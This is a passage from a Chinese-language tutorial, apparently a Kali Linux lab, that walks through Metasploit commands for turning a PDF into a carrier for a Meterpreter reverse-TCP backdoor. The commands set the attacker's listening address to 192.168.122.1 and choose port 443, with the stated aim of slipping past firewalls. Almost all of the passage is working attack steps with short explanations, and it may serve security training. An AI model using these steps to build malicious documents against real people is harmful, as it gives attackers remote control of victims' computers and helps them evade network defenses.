设置自定义 Payload
为了使感染的 PDF 文件更具价值,我们可以为其设置一个自定义 payload。
重新进入 msfconsole
:
cd ~
msfconsole
在 msfconsole
中,按照之前的步骤选择攻击模块:
use exploit/windows/fileformat/adobe_pdf_embedded_exe
这次,我们将使用 windows/meterpreter/reverse_tcp
payload,这是一个 Meterpreter 后门,它可以从被攻陷的主机建立 TCP 连接返回到攻击者的机器,从而允许直接访问被攻陷的系统。如果需要,你可以使用 show payloads
命令查看并选择其他 payload。
设置 windows/meterpreter/reverse_tcp
payload:
set payload windows/meterpreter/reverse_tcp
通过指定你的 Kali 主机的 IP 地址和端口来配置 payload,以接收传入的连接。确保目标主机可以连接到你的 Kali 主机:
set lhost 192.168.122.1
使用端口 443 可以帮助绕过一些防火墙:
set lport 443
然后使用 exploit
命令生成恶意 PDF 文件:
exploit
按 Ctrl+D 退出 Metasploit 控制台,然后开始检查